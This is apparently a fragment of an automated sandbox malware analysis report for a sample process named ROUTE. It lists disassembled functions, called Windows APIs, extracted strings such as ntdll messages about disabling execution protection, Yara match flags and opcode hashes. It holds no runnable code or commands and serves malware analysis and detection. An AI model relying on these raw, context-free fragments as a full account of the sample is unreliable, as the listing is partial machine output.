                                                                                • Instruction Fuzzy Hash: 8890023120248C02F510B158C40474A004587D1301F59C412A4828668D879589917125
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 5498226d04ee123b408a39dd171da59a8acd1e4ffb48960575e4a6dee4069a5b
                                                                                • Instruction ID: d1d95cf98744c16dfa108f9b275b97a5d7e400096a46064d0e8629cbff2d92e5
                                                                                • Opcode Fuzzy Hash: 5498226d04ee123b408a39dd171da59a8acd1e4ffb48960575e4a6dee4069a5b
                                                                                • Instruction Fuzzy Hash: AF90023120240802F500B5989408646004587E1301F55D012A5428565EC76589917135
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 42cb2cc97bbfdfc51e00850aea1ce313b40a23d24233d1a42dd4986f4ceeebba
                                                                                • Instruction ID: 23ef9a61063a308bbce436620bb6a67a6017882db5b7d95b08112047a281f0cf
                                                                                • Opcode Fuzzy Hash: 42cb2cc97bbfdfc51e00850aea1ce313b40a23d24233d1a42dd4986f4ceeebba
                                                                                • Instruction Fuzzy Hash: 6890023160650802F500B1588514706104587D1201F65C412A0828578D87958A5175A6
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8ad74eaa729234b97e278285f2263ed299a9584177dc9a01afdc377a03152296
                                                                                • Instruction ID: 346dcd8a9d0636252f38184be384e2c92b3d70d8ea53a32698477f891fd6c6bf
                                                                                • Opcode Fuzzy Hash: 8ad74eaa729234b97e278285f2263ed299a9584177dc9a01afdc377a03152296
                                                                                • Instruction Fuzzy Hash: 9090022124645502F550B15C84046164045A7E1201F55C022A0C185A4D865589557225

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(-4108694,00000111,00000000,00000000), ref: 02830E37
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: -4108694$-4108694
                                                                                • API String ID: 1836367815-789369925
                                                                                • Opcode ID: 921bc606f20d3f0f2e03e4b878ab4354d020b27003acf64135da2f377626372d
                                                                                • Instruction ID: 160b3cea3216e0167bd92cc2f696646bc1c45d91c1f30d48a121ba2520b400fe
                                                                                • Opcode Fuzzy Hash: 921bc606f20d3f0f2e03e4b878ab4354d020b27003acf64135da2f377626372d
                                                                                • Instruction Fuzzy Hash: F90196BAD0121C7AEB11AAE49C81EEFBB7CDF45694F048064FA18B7140D6745E064BF2
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 02843B7B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: net.dll$wininet.dll
                                                                                • API String ID: 3472027048-1269752229
                                                                                • Opcode ID: 4cc91667ed27a535124eaba8e02b0d47fb98c87d61e01af6f80ed31981894772
                                                                                • Instruction ID: 34c98a16016d31dab77fa1bf715292da15798782467bb44e6473302f3caa5471
                                                                                • Opcode Fuzzy Hash: 4cc91667ed27a535124eaba8e02b0d47fb98c87d61e01af6f80ed31981894772
                                                                                • Instruction Fuzzy Hash: CB3193B9A00209BBD714DFA4CC84FEBBBB9FB84704F108559E51D9B240D774AA44CBA5
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeUninitialize
                                                                                • String ID: @J7<
                                                                                • API String ID: 3442037557-2016760708
                                                                                • Opcode ID: 7a03beab84a75b1469b1daf4eb69f1a4a669412261217e290c4517e6c01e4ddc
                                                                                • Instruction ID: ec9b3d76d71ab985621c6e30e6265a6dda7fadbe9ea261335b174a1102052789
                                                                                • Opcode Fuzzy Hash: 7a03beab84a75b1469b1daf4eb69f1a4a669412261217e290c4517e6c01e4ddc
                                                                                • Instruction Fuzzy Hash: C531237AE00609AFDB10DFD8D8809EEB7B9BF48304B108559E615EB214D775EE058BE0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeUninitialize
                                                                                • String ID: @J7<
                                                                                • API String ID: 3442037557-2016760708
                                                                                • Opcode ID: 599e94375fd12ecb97e2f4b8d1889a5c76f917e89a0409b6cc35ead2fb38b8ec
                                                                                • Instruction ID: 4dc0adebe24a3705e16779f8effb04ec7006646557667eed4584990bc5686230
                                                                                • Opcode Fuzzy Hash: 599e94375fd12ecb97e2f4b8d1889a5c76f917e89a0409b6cc35ead2fb38b8ec
                                                                                • Instruction Fuzzy Hash: 3F31237AE00609AFDB10DFD8D8809EEB7B9BF48304B104559E605E7214D775EE058BE0
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028345E2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID: axD3
                                                                                • API String ID: 2234796835-3556351365
                                                                                • Opcode ID: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                • Instruction ID: 4ca7e4c7bd277047a9e604f748937104e6399a9d1d8a92c5edc54c7ddb5c71f8
                                                                                • Opcode Fuzzy Hash: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                • Instruction Fuzzy Hash: FB1156BE90060A7BE702DFA8CC41B9AB7B89B04618F144228ED19DB281E770D605C7D1
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02831D50,02847FCE,0284568F,02831D13), ref: 02838193
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: a700d42c835ce2977903810198fec52443f9cf3e02a7cad405b17eeed7dfaeee
                                                                                • Instruction ID: b9db71213755c66fb38be3fa0d05de299a5dec28b52fe4d54276d7f6f02316a2
                                                                                • Opcode Fuzzy Hash: a700d42c835ce2977903810198fec52443f9cf3e02a7cad405b17eeed7dfaeee
                                                                                • Instruction Fuzzy Hash: 801106799443087BEB11EBE4CC4AFAA73699B41310F044199F80CEB192FBB595548BE6
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028345E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                • Instruction ID: d203624fbf1b19a3f6e070a9902c2fb0ba2c8915e97c2a8a2ba3bf0b03ec8b83
                                                                                • Opcode Fuzzy Hash: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                • Instruction Fuzzy Hash: 9901CCBED4020DABDB14DAE4DC41F9DB7B99B54308F004195A908D7241FA71E7588B92
                                                                                APIs
                                                                                • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,0283832E,00000010,?,?,?,00000044,?,00000010,0283832E,?,00000000,?), ref: 02849943
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInternalProcess
                                                                                • String ID:
                                                                                • API String ID: 2186235152-0
                                                                                • Opcode ID: 671fddae834eef9a986202feb47780fc4726c027dd2d673c94bd21dafe3b195e
                                                                                • Instruction ID: fe344475aef488440bbd9232f9ba5bdae2cd20847270222241607fbf79aae7f5
                                                                                • Opcode Fuzzy Hash: 671fddae834eef9a986202feb47780fc4726c027dd2d673c94bd21dafe3b195e
                                                                                • Instruction Fuzzy Hash: 9B01C4B6204108BBCB44DE8DDC80EDB77ADAF8C714F118208BA0DE7241DA30F8518BA4
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02829DF5
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: a00885ac3c91a2ed3eecabbd7396b270ed8e90709770fb43edf4f08bfa2c8301
                                                                                • Instruction ID: 69288f315741025624754be96ffcf09bfcbbe901eead4d9f47c1b6d5e3bb5f37
                                                                                • Opcode Fuzzy Hash: a00885ac3c91a2ed3eecabbd7396b270ed8e90709770fb43edf4f08bfa2c8301
                                                                                • Instruction Fuzzy Hash: 09F0307B28021436E22065E99C02F97A29DCB807A1F254466F60CEB180D991B95146E6
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 0283839C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: d2d9782d338baf92f7f6c86506228d20aff339c068052cd2d406c6ccabd55ddd
                                                                                • Instruction ID: 5f7fa12616f1fd1b930441f72605fd8112668930e6557dab81d9400b32510e07
                                                                                • Opcode Fuzzy Hash: d2d9782d338baf92f7f6c86506228d20aff339c068052cd2d406c6ccabd55ddd
                                                                                • Instruction Fuzzy Hash: 10F0973D2102052BEB12AB38CC86BB27718EB44724F584698F488CB3C3E6B9F40283C0
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000104,?,0284180C,?,?,0284180C,?,00000104,?,00009D57), ref: 0284983C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                • Instruction ID: a475681b8e58fcc897f2725a78a6b96cc5436458fd6282d339b9adeb58fae8e7
                                                                                • Opcode Fuzzy Hash: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                • Instruction Fuzzy Hash: EFE06D796042047BD614EE58DC44F9B77ADDFC8710F004008FA0CA7241DA71B8118BB9
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F845C700,00000007,00000000,00000004,00000000,02833DDB,000000F4), ref: 0284988C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                • Instruction ID: c957fb939e188791154bc6be12c0feb4eadaff3284687cf2eb7fc82b9cc1ce9f
                                                                                • Opcode Fuzzy Hash: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                • Instruction Fuzzy Hash: F9E06DBA2042047BD614EE5CDC45F9B33ADDFC8710F004008FA08A7242D671B8108BB9
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 0283839C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 05fb7c337f53ac48de3ae62af19cb0c17d93f744b11d69e0e8308fd602dbfd3e
                                                                                • Instruction ID: 622a41e83d4fccf90e351a7a3284beb5083886f5e8eb30567f95161934ba9298
                                                                                • Opcode Fuzzy Hash: 05fb7c337f53ac48de3ae62af19cb0c17d93f744b11d69e0e8308fd602dbfd3e
                                                                                • Instruction Fuzzy Hash: D5E0D87D50020527EB207668CC45BA63358AB44764F584664B81CDB2C2E679E55143D0
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 0283839C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: f9794e067ae3447b555326686bc9826f63314cf8011d7de037bd7b062c62e9e5
                                                                                • Instruction ID: af2db3cb6bb484fcaf01f74278824be505e224c867e82abf57c56e072129376d
                                                                                • Opcode Fuzzy Hash: f9794e067ae3447b555326686bc9826f63314cf8011d7de037bd7b062c62e9e5
                                                                                • Instruction Fuzzy Hash: 58E0267D65020827FF206AA8DC49F6633589B88728F1C4660B81CDB3C1E67CF51182D0
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02831D50,02847FCE,0284568F,02831D13), ref: 02838193
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 5030f345bf0ee70ff83990bab5f9a31eec18b2c10fa2af2b5d8427bb27453d03
                                                                                • Instruction ID: 3df86f744711ecbbdeb993dac0172c28b51c441a897c4b36ef8143804f3172df
                                                                                • Opcode Fuzzy Hash: 5030f345bf0ee70ff83990bab5f9a31eec18b2c10fa2af2b5d8427bb27453d03
                                                                                • Instruction Fuzzy Hash: 8AE0866928438637F741E7F49C0AF5ABB495F42254F1C84E8B94CEB2C3D991D15087E5
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02831D50,02847FCE,0284568F,02831D13), ref: 02838193
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 66acfe115b10dd0cdfbbbef63d3d977e36db5f9dd7ea407bfb29fc943c5f1d26
                                                                                • Instruction ID: ecc04d1aee5834b0a0063e5520e1f9c895faee794e8e070000593a5dad28d799
                                                                                • Opcode Fuzzy Hash: 66acfe115b10dd0cdfbbbef63d3d977e36db5f9dd7ea407bfb29fc943c5f1d26
                                                                                • Instruction Fuzzy Hash: BFD05B792403053BF540B6E4CC0AF56724D5740754F148074B50CE72C2DD65F11046E5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                 • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 435c5b2fc0c3e1375a0cc8701a37d6501c0e3e94c2bf2de0f4157fb6f82fac46
                                                                                • Instruction ID: b2429b010862b2e6ef175045ecc6e2ca7da5a214bf228c8c8754134fda4f7f27
                                                                                • Opcode Fuzzy Hash: 435c5b2fc0c3e1375a0cc8701a37d6501c0e3e94c2bf2de0f4157fb6f82fac46
                                                                                • Instruction Fuzzy Hash: 69B09B719035C5C5FE51F7604608717794467D1701F19C462D2434655F4739C1D1F175
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897322722.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2f20000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                • API String ID: 0-3558027158
                                                                                • Opcode ID: 6e578b878be74098917343d695d2a51f32c8d2ed80991d1ede1da86247c354e8
                                                                                • Instruction ID: 112174ae9e98800a3350fe1a9c4ef375084f8baab36bfaf17afc2186c87ec635
                                                                                • Opcode Fuzzy Hash: 6e578b878be74098917343d695d2a51f32c8d2ed80991d1ede1da86247c354e8
                                                                                • Instruction Fuzzy Hash: AF9140F04482948AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89098B95
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                 • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: cc668c41872b031224bccddead62e50b50f3d194229855a21d99b9d31d89d2e4
                                                                                • Instruction ID: 4c0024bf863a298bf3bd4c580dcc6cfeb1552984f1e720eebbbbbafdb793af1b
                                                                                • Opcode Fuzzy Hash: cc668c41872b031224bccddead62e50b50f3d194229855a21d99b9d31d89d2e4
                                                                                • Instruction Fuzzy Hash: 9851D9B5B02116BFCF20EB98889057EF7FCBB49200B148969E4E5D7641D374DE518BA0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                 • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 78155e90c670b5ba6c7e9d68a96b1ff34ed507fe9df83812c7e036639aae392b
                                                                                • Instruction ID: e545826b0c5d38dda222a763e20230fb4a7388a26462299a130aba462a293092
                                                                                • Opcode Fuzzy Hash: 78155e90c670b5ba6c7e9d68a96b1ff34ed507fe9df83812c7e036639aae392b
                                                                                • Instruction Fuzzy Hash: 8F51277DA05A45AFCB70DF9CC89097FB7FDEB44600B048C9AE695C7A41D7B4EA408760
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897322722.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2f20000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ##.`$#&$*$&#*`$&$*o$&;`y$.).=$??#*$a{og$a}a{$o${$|vx}
                                                                                • API String ID: 0-3596917867
                                                                                • Opcode ID: 7a11c76c9737fc9a91b10bddbb426355f46157ad682ba83da3993119e561a5bf
                                                                                • Instruction ID: 4fde93d539cbd01f81ee93c1be10c446e34dd860158936a6660545b4b44c21d4
                                                                                • Opcode Fuzzy Hash: 7a11c76c9737fc9a91b10bddbb426355f46157ad682ba83da3993119e561a5bf
                                                                                • Instruction Fuzzy Hash: 6C3196F081424CDBCF19AF84E5816DEBBB2FF14384F805258EA056F200D7B58A19CB89
                                                                                Strings
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 030B4742
                                                                                • Execute=1, xrefs: 030B4713
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 030B4787
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 030B4655
                                                                                • ExecuteOptions, xrefs: 030B46A0
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030B46FC
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 030B4725
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                 • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 0-484625025
                                                                                • Opcode ID: 6304d839b0db6bd4c4aca3441b456dd2969fb613515b356e6fb37d24dc7245e9
                                                                                • Instruction ID: c65aa27392f8264f2cd247678b08e995db8fe4e47b0e98039a025815aea2358b
                                                                                • Opcode Fuzzy Hash: 6304d839b0db6bd4c4aca3441b456dd2969fb613515b356e6fb37d24dc7245e9
                                                                                • Instruction Fuzzy Hash: D4512735A023197ADF21EBA4DC85FFEB7B8AF48B40F0404A9D505AB181E771AA41CF65
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                 • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                • Instruction ID: aac6dc1db59654f95c0f44bbe66a90db710adc4c3f71f05ef9def85ae8aa3665
                                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                • Instruction Fuzzy Hash: AB022675609341AFC705DF18C890AAFBBE5EFC8700F058A2DF9859B264DB32E915CB42
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                 • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
